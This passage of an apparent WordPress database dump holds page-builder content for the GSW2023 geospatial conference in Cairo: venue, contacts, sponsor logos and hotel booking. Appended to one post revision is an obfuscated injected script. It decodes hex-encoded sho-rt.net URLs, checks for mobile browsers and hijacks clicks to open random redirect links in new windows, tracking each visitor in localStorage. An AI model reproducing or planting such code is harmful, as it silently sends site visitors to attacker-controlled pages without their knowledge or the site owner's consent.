#311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:45:47','2023-06-18 13:45:47','',3066,'https://gsw2023.com/?p=4709',0,'revision','',0),
(4710,1,'2023-06-18 13:46:48','2023-06-18 13:46:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 